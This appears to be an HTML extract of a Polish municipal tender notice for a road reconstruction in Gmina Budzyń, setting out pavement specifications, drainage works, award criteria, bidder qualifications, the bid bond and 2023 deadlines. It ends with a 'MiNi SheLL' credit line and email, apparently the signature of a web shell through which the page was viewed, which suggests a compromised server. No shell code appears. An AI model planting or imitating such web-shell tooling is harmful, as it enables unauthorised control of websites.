droga<br/>przebiega po istniejącym spadku podłużnym<br/>Konstrukcja nawierzchni jezdni<br/>• profilowanie i zagęszczenie istniejącej nawierzchni tłuczniowej,<br/>• wyrównanie istniejącego profilu nawierzchni tłuczniowej mieszanką niezwiązaną z kruszywem C50/30, średnia grub.<br/>warstwy 5 cm,<br/>• warstwa wiążąca o grub. 5 cm, z mieszanki mineralno-asfaltowej AC 16W-50/70<br/>(dla KR 1),<br/>• warstwa ścieralna o grub. 4 cm, z mieszanki mineralno-asfaltowej AC 11S-50/70<br/>(dla KR 1).<br/>poszerzenia obu mijanek muszą mieć pełną konstrukcję nawierzchni jezdni, która przedstawia się następująco:<br/>• warstwa mrozoochronna z piasku wg. normy PN-B-11113, grub. 15 cm,<br/>• podbudowa z mieszanki niezwiązanej z kruszywem C50/30, grub. warstwy 22 cm,<br/>• warstwa wiążąca o grub. 5 cm, z mieszanki mineralno-asfaltowej AC 16W-50/<br/>• warstwa ścieralna o grub. 4 cm, z mieszanki mineralno-asfaltowej AC 11S-50/70<br/>Parametry techniczne zjazdów:<br/>• długość po osi – od 2,5 do 3,6 m,<br/>• szerokość – 4,0 m,<br/>• połączenie jezdni z zjazdami będzie w formie skosów o wielkości 1,5 m,<br/>• spadek poprzeczny zjazdów wynosi 2,0 % w kierunku do jezdni,<br/>• spadek podłużny – dostosowany do przyległej jezdni.<br/>Projektuje się wykonanie przebudowy dziewięciu zjazdów do przyległych pól i posesji w lokalizacji jak niżej, o konstrukcji:<br/>• warstwa mrozoochronna z piasku wg. normy PN-B-11113, grub. 15 cm,<br/>• podbudowa z mieszanki niezwiązanej z kruszywem C50/30, grub. warstwy 20 cm,<br/>• warstwa wiążąca o grub. 4 cm, z mieszanki mineralno-asfaltowej AC 16W-50/70,<br/>• warstwa ścieralna o grub. 4 cm, z mieszanki mineralno-asfaltowej AC 11S-50/70.<br/>Odwodnienie<br/>Wody opadowe z przebudowywanej drogi zostaną odprowadzone grawitacyjnie, poprzez nadanie 2 % spadku poprzecznego<br/>na jezdni i 2 % spadku podłużnego na zjazdach w kierunku na pobocze i dalej do rowów przydrożnych lub na zieleńce.<br/>Po wykonaniu nawierzchni ścieralnej na jezdni projektuje się wykonanie uzupełnienia poboczy mieszanką niezwiązaną z<br/>kruszywem C50/30 (kliniec o uziarnieniu 0/31,5 mm), o grub. warstwy 15 cm. Uzupełnienie to wykonać należy do wysokości<br/>krawędzi nowo ułożonej warstwy ścieralnej jezdni.<br/>Zaprojektowano szerokość pobocza lewo i prawostronnego wzdłuż jezdni o szerok. po 1,0 m, a wzdłuż zjazdów po 1,5 m.<br/>Spadek poprzeczny poboczy – 6% w kierunku do rowów przydrożnych lub zieleńców.<br/>Po lewej stronie drogi powiatowej umieszczone są rowy przydrożne, na których należy wykonać ich konserwację poprzez<br/>ich pogłębienie i oczyszczanie z namułu wraz z profilowaniem dna i skarp tych rowów (1446,1 mb). Rowy należy wykonać w<br/>kształcie trapezowym o szerokości dna 0,4 m i nachyleniu skarp od 1:1 do 1:1,5.<br/>Min. głębokość rowu 1,0 m liczona jako różnica poziomów dna i krawędzi górnej rowu (pobocza).<br/>Pod koroną przebudowywanej drogi gminnej w obrębie skrzyżowania z drogą wewnętrzną w km. 0+427,6 zaprojektowano<br/>wykonanie remontu przepustu z zachowaniem jego istniejących parametrów technicznych i pozostawieniem istniejącej<br/>rzędnej wlotu i wylotu.<br/>Remont tego przepustu wykonać z rur przepustowych z polietylenu PEHD karbowanych (SN8) o śred. 40 cm i o dług. 12,0<br/>m z wymaganymi robotami ziemnymi i odtworzeniem podbudowy.<br/>Pod zjazdami przebudowywanej drogi gminnej w lokalizacji wykonanie remontu przepustów z zachowaniem ich istniejących<br/>parametrów technicznych i pozostawieniem istniejącej rzędnej wlotu i wylotu. Remont tych przepustów wykonać z rur<br/>przepustowych z polietylenu PEHD karbowanych (SN8) o śred. 40 cm z wymaganymi robotami ziemnymi i odtworzeniem<br/>podbudowy.<br/>W ramach remontu przepustów, celu wyeliminowania ich podmywania i wpływu wody pod rurę przepustową należy wykonać<br/>umocnienie skarpy wlotu i wylotu oraz dna rowu brukiem tj. kostką kamienną lub brukowcem o grub. 13/17 cm, na podłożu z<br/>betonu C12/15 grub. min. 10 cm z wypełnieniem spoin zaprawą cementową 1:3. Min. wymiar umocnienia to 1,2 m x 1,5 m.<br/>Obrukowanie musi być wykonane pod kątem 45 stopni.<br/>Urządzenia brd.<br/>Dla zabezpieczenia poprzecznego przepustu melioracyjnego w km. 0+807,0 zaprojektowano wzdłuż przebudowywanej<br/>drogi po jej prawej i lewej stronie po dwa odcinki barier ochronnych U-14a o długości po 16,0 m.<br/>System zaprojektowanych barier ochronnych to N2W4A w rozstawie słupków C-100 co 4,0 m.<br/>Bariery muszą być ocynkowane według EN ISO 146 z elementami odblaskowymi U-1c, koloru białego i czerwonego w<br/>rozstawie co 2,0 m.<br/>Zieleń<br/>Przed przystąpieniem do robót należy wykonać karczowanie krzewów oraz redukcję koron drzew dla gałęzi wchodzących w<br/>kolizję z skrajnią drogową pasa drogowego.<br/>Do redukcji korony drzew celem usunięcia gałęzi wchodzących w kolizję z skrajnią drogową są drzewa w ilości 4 sz. oraz<br/>usunięcie i wykarczowanie pnia z karpią o średnicy powyżej 100 cm.<br/>Szczegółowy opis i zakres wykonania przedmiotu zamówienia dla poszczególnych części zamówienia zawiera<br/>dokumentacja projektowa, w skład której wchodzą:<br/>- dokumentacja techniczna<br/>- przedmiary robót (kosztorysy ofertowe),<br/>- Specyfikacje Techniczne Wykonania i Odbioru Robót budowlanych ( dalej STWiORB).<br/>Dokumentacja projektowa dostępna jest na stronie internetowej prowadzonego postępowania pod adresem :<br/>https://ezamowienia.gov.pl<br/>Powyższe dokumenty zostały pogrupowane odpowiednio dla każdej z części postępowania przetargowego i stanowią<br/>załącznik nr 9 do niniejszej SWZ.<br/>Uwaga:<br/>Załączone przedmiary robót(kosztorysy ofertowe) stanowią zakresy prac objętych niniejszym postępowaniem i służą<br/>wykonawcom jako pomoc w oszacowaniu kosztów inwestycji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233140-2 - Roboty drogowe</p> <p class="mb-0">45233252-0 - Roboty w zakresie nawierzchni ulic</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert przyznając punkty w ramach<br/>poszczególnych kryteriów oceny ofert, przyjmując zasadę 1%=1 punkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji na wykonane roboty i zamontowane urządzenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki udziału<br/>w postępowaniu, dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym;<br/>Zamawiający nie określa warunku w powyższym zakresie.<br/>2) sytuacji ekonomicznej i finansowej: tj.: posiadają środki finansowe lub zdolność kredytową w wysokości co najmniej:<br/>- na część nr 1: 200 000,00 zł (słownie: dwieście tysięcy złotych), co potwierdzą poprzez złożenie aktualnej informacji banku;<br/>- na część nr 2: 500 000,00 zł (słownie: pięćset tysięcy złotych), co potwierdzą poprzez złożenie aktualnej informacji banku;<br/>- na część nr 3: 500 000,00 zł (słownie: pięćset tysięcy złotych), co potwierdzą poprzez złożenie aktualnej informacji banku;<br/>UWAGA! WYKONAWCA SKŁADAJĄC OFERTĘ NA DWIE LUB WIĘCEJ CZĘŚCI MUSI WYKAZAĆ SPEŁNIENIE<br/>WARUNKU POPRZEZ POSIADANIE ŚRODKÓW FINANSOWYCH LUB ZDOLNOŚCI KREDYTOWEJ W WYSOKOŚCI CO<br/>NAJMNIEJ: 800.000,00 ZŁ (OSIEMSET TYSIĘCY ZŁOTYCH).<br/>Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie dokumentów złożonych przez<br/>wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA (wg załącznika nr 2)<br/>zdolności technicznej lub zawodowej: tj.:<br/>a) doświadczenie:<br/>posiadają doświadczenie umożliwiające realizację zamówienia tzn. wykonali należycie oraz<br/>zgodnie z przepisami prawa budowlanego i prawidłowo ukończyli w okresie ostatnich 5 lat przed upływem terminu składania<br/>ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie minimum 2 roboty budowlane , z których każda<br/>polegała na budowie, przebudowie lub remoncie nawierzchni drogi o nawierzchni bitumicznej, o wartości wykonanych robót<br/>nie mniejszej niż 300.000,00 zł brutto (słownie: trzysta tysięcy złotych), co potwierdzą w wykazie wykonanych robót oraz<br/>referencjami;<br/>WYKONAWCA SKŁADAJĄC OFERTĘ NA KILKA CZĘŚCI MUSI WYKAZAĆ SPEŁNIENIE WARUNKÓW JAK DLA JEDNEJ<br/>CZĘŚCI ZAMÓWIENIA.<br/>Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie dokumentów złożonych przez<br/>wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA (wg załącznika nr 2)<br/>Uwaga:<br/>Jeżeli wykonawca zamierza potwierdzić spełnianie warunku dokumentami wystawionymi dla konsorcjum, w którym był<br/>partnerem, z treści referencji lub innych dokumentów musi wynikać, jakie roboty i o jakiej wartości były wykonane przez<br/>wykonawcę składającego ofertę.<br/>b) dysponują lub będą dysponować:<br/>- kierownikiem budowy/robót (1 osoba) posiadającym uprawnienia budowlane do pełnienia samodzielnych funkcji<br/>technicznych w budownictwie w specjalności drogowej lub inne uprawnienia umożliwiające wykonywanie tych samych<br/>czynności, na wykonywanie których w aktualnym stanie prawnym pozwalają uprawnienia budowlane w tej specjalności oraz<br/>wpis na listę członków właściwej izby samorządu zawodowego, co potwierdzą w wykazie osób zdolnych do realizacji<br/>zamówienia.<br/>Osoba wskazana w wykazie osób będzie pełniła funkcję kierownika budowy w trakcie realizacji zadania będącego<br/>przedmiotem niniejszego postępowania o udzielenie zamówienia publicznego. W przypadku gdy Wykonawca będzie<br/>zmuszony do zmiany kierownika budowy musi zapewnić udział osoby, o wiedzy i doświadczeniu odpowiadającym<br/>warunkom określonym w niniejszym SWZ.<br/>Zamawiający, określając wymogi w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im<br/>uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z<br/>zastrzeżeniem art. 12a oraz innych przepisów ustawy z dnia 7 lipca 1994 r. – Prawo budowlane (Dz. U. z 2021 r., poz. 2351<br/>ze zm.).<br/>Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie dokumentów złożonych przez<br/>wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA (wg załącznika nr 5)<br/>5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: Tak<br/>5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: W celu potwierdzenia przez<br/>wykonawcę braku podstaw wykluczenia z postępowania, Zamawiający żąda złożenia :<br/>1) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 ustawy, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji - wystawione nie wcześniej<br/>niż 3 miesiące przed ich złożeniem,<br/>2) oświadczenia własnego wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy,<br/>w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, o których mowa w:<br/>a) art. 108 ust. 1 pkt 3 ustawy,<br/>b) art. 108 ust. 1 pkt 4 ustawy, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka<br/>zapobiegawczego.<br/>c) art. 108 ust. 1 pkt 5 ustawy, dotyczących zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie konkurencji,<br/>d) art. 108 ust. 1 pkt 6 ustawy,<br/>e) art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na<br/>Ukrainę oraz służących ochronie bezpieczeństwa narodowego ( Dz. U. z 2022 r. poz. 835 ).<br/>3) oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym<br/>wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub<br/>informacjami potwierdzającymi przygotowanie oferty, niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej<br/>(wg załącznika nr 7),<br/>Zamawiający żąda od wykonawcy, który polega na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub<br/>ekonomicznej podmiotów udostępniających zasoby na zasadach określonych w art. 118 ustawy, przedstawienia podmiotowych<br/>środków dowodowych, o których mowa w ppkt. 1 – 2) dotyczących tych podmiotów, potwierdzających, że nie zachodzą wobec tych<br/>podmiotów podstawy wykluczenia z postępowania. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia przez<br/>wykonawcę braku podstaw wykluczenia z postępowania, Zamawiający żąda złożenia :<br/>1) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 ustawy, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji - wystawione nie wcześniej<br/>niż 3 miesiące przed ich złożeniem,<br/>2) oświadczenia własnego wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy,<br/>w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, o których mowa w:<br/>a) art. 108 ust. 1 pkt 3 ustawy,<br/>b) art. 108 ust. 1 pkt 4 ustawy, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka<br/>zapobiegawczego.<br/>c) art. 108 ust. 1 pkt 5 ustawy, dotyczących zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie konkurencji,<br/>d) art. 108 ust. 1 pkt 6 ustawy,<br/>e) art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na<br/>Ukrainę oraz służących ochronie bezpieczeństwa narodowego ( Dz. U. z 2022 r. poz. 835 ).<br/>3) oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym<br/>wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub<br/>informacjami potwierdzającymi przygotowanie oferty, niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej<br/>(wg załącznika nr 7),<br/>Zamawiający żąda od wykonawcy, który polega na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub<br/>ekonomicznej podmiotów udostępniających zasoby na zasadach określonych w art. 118 ustawy, przedstawienia podmiotowych<br/>środków dowodowych, o których mowa w ppkt. 1 – 2) dotyczących tych podmiotów, potwierdzających, że nie zachodzą wobec tych<br/>podmiotów podstawy wykluczenia z postępowania.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">2. W<br/>celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej lub<br/>zawodowej, sytuacji finansowej, Zamawiający żąda następujących podmiotowych środków dowodowych :<br/>1) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te<br/>zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane lub usługi zostały wykonane należycie, przy<br/>czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty<br/>budowlane lub usługi zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych<br/>dokumentów – inne odpowiednie dokumenty ( wg załącznika Nr 4 ),<br/>2) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacją na temat ich kwalifikacji zawodowych,<br/>uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych<br/>przez nie czynności oraz informację o podstawie do dysponowania tymi osobami (wg załącznika Nr 5)<br/>3) informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków<br/>finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie żąda przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 3) Pełnomocnictwo - gdy umocowanie osoby składającej ofertę nie wynika z dokumentów rejestrowych, wykonawca, który<br/>składa ofertę za pośrednictwem pełnomocnika, powinien dołączyć do oferty dokument pełnomocnictwa obejmujący swym<br/>zakresem umocowanie do złożenia oferty lub do złożenia oferty i podpisania umowy.<br/>W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia, z którego będzie wynikało umocowanie do<br/>reprezentowania w postępowaniu o udzielenie zamówienia; powinno zawierać: nazwę postępowania o zamówienie<br/>publiczne, którego dotyczy, wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z<br/>nazwy z określeniem adresu siedziby, ustanowionego pełnomocnika oraz zakres jego umocowania.<br/>Pełnomocnictwo powinno zostać złożone w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem<br/>zaufanym, lub podpisem osobistym. Dopuszcza się również przedłożenie elektronicznej kopii dokumentu poświadczonej za<br/>zgodność z oryginałem przez notariusza, tj. podpisanej kwalifikowanym podpisem elektronicznym osoby posiadającej<br/>uprawnienia notariusza.<br/>4) Zobowiązanie podmiotu (jeżeli dotyczy) udostępniającego zasoby lub inny podmiotowy środek dowodowy potwierdzający,<br/>że stosunek łączący wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów<br/>oraz określa w szczególności:<br/>a) zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby,<br/>b) sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby<br/>przy wykonywaniu zamówienia,<br/>c) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca polega w odniesieniu do<br/>warunków udziału w postępowaniu dotyczących kwalifikacji zawodowych lub doświadczenia, zrealizuje usługi, których<br/>wskazane zdolności dotyczą,<br/>Wzór zobowiązania określa załącznik Nr 3.<br/>Zobowiązanie musi być złożone w formie elektronicznej i podpisane kwalifikowanym podpisem elektronicznym lub w postaci<br/>elektronicznej podpisane podpisem zaufanym, lub podpisem osobistym osoby upoważnionej do reprezentowania<br/>wykonawców zgodnie z formą reprezentacji określoną w dokumencie rejestrowym właściwym dla formy organizacyjnej lub<br/>innym dokumencie <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca przystępujący do postępowania jest zobowiązany, przed upływem terminu składania ofert, wnieść wadium w<br/>kwocie:<br/>a) dla części Nr 1 – 3 000,00 zł (słownie: trzy tysiące zł)<br/>b) dla części Nr 2 - 8 000,00 zł (słownie: osiem tysięcy zł)<br/>c) dla części Nr 3 – 8 000,00 zł (słownie: osiem tysięcy zł)<br/>2. Wadium musi obejmować pełen okres związania ofertą.<br/>3. Wadium może być wniesione w jednej lub kilku formach wskazanych w art. 97 ust. 7 ustawy Pzp.<br/>4. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy:<br/>Bank : Bank Spółdzielczy Chodzież / Oddział Budzyń<br/>Nr rachunku : 26 8945 0002 2600 0101 2000 0070<br/>Wadium musi wpłynąć na wskazany rachunek bankowy Zamawiającego najpóźniej przed upływem terminu składania ofert<br/>(decyduje data wpływu na rachunek bankowy Zamawiającego).<br/>5. Wadium wnoszone w poręczeniach lub gwarancjach należy załączyć do oferty w oryginale w postaci dokumentu<br/>elektronicznego podpisanego kwalifikowanym podpisem elektronicznym przez wystawcę dokumentu i powinno zawierać<br/>następujące elementy:<br/>- nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta/poręczyciela oraz wskazanie<br/>ich siedzib. Beneficjentem wskazanym w gwarancji lub poręczeniu musi być Gmina Budzyń,<br/>- określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem,<br/>- kwotę gwarancji/poręczenia,<br/>- termin ważności gwarancji/poręczenia,<br/>- zobowiązanie gwaranta do zapłacenia kwoty gwarancji/poręczenia bezwarunkowo, na pierwsze pisemne żądanie<br/>zamawiającego, w sytuacjach określonych w art. 98 ust. 6 ustawy Pzp.<br/>7. W przypadku, gdy wykonawca nie wniósł wadium lub wniósł w sposób nieprawidłowy lub nie utrzymywał wadium<br/>nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium, w przypadku o którym mowa w art. 98<br/>ust. 2 pkt 3 ustawy Pzp, Zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 14 ustawy Pzp.<br/>8. Zamawiający dokona zwrotu wadium na zasadach określonych w art. 98 ust. 1–5 ustawy Pzp.<br/>9. Zamawiający zatrzymuje wadium wraz z odsetkami na podstawie art. 98 ust. 6 ustawy Pzp. 10.Złożenie wniosku o zwrot<br/>wadium, o którym mowa w art. 98 ust. 2 ustawy Pzp, powoduje rozwiązanie stosunku prawnego z wykonawcą wraz z utratą<br/>przez niego prawa do korzystania ze środków ochrony prawnej, o których mowa w dziale IX. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia :<br/>1) wspólnie muszą wykazać, że wspólnie spełniają warunki udziału w postępowaniu,<br/>2) w stosunku do żadnego z nich nie zachodzi jakakolwiek podstawa do wykluczenia<br/>z postępowania na podstawie art. 108 ust. 1 oraz oraz art. 109 ust. 1 pkt. 4, ustawy Pzp, oraz art. 7 ust. 1 ustawy z dnia 13<br/>kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących<br/>ochronie bezpieczeństwa narodowego ( Dz. U. z 2022 r. poz. 835)<br/>3) ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązania,<br/>4) muszą ustanowić pełnomocnika wykonawców występujących wspólnie do reprezentowania ich w postępowaniu o<br/>udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia.<br/>Pełnomocnictwo musi mieć formę pisemną lub kopię potwierdzona przez notariusza,<br/>5) przed zawarciem umowy o niniejsze zamówienie publiczne, jeżeli oferta konsorcjum zostanie wybrana jako<br/>najkorzystniejsza, Zamawiający wezwie do przedstawienia umowy regulującej współpracę tych wykonawców,<br/>6) wykonawcy wspólnie ubiegający się o udzielenie zamówienia mają obowiązek dołączyć do oferty oświadczenie, z którego<br/>będzie wynikać, jakie roboty budowlane wykonają poszczególni wykonawcy,<br/>7) przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia zawarto w załączniku Nr 6.1, 6.2 oraz 6.3 do SWZ- Wzór<br/>umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-08-14 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z załącznikami należy złożyć za pośrednictwem Platformy na adres : https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-08-14 11:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-09-12</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com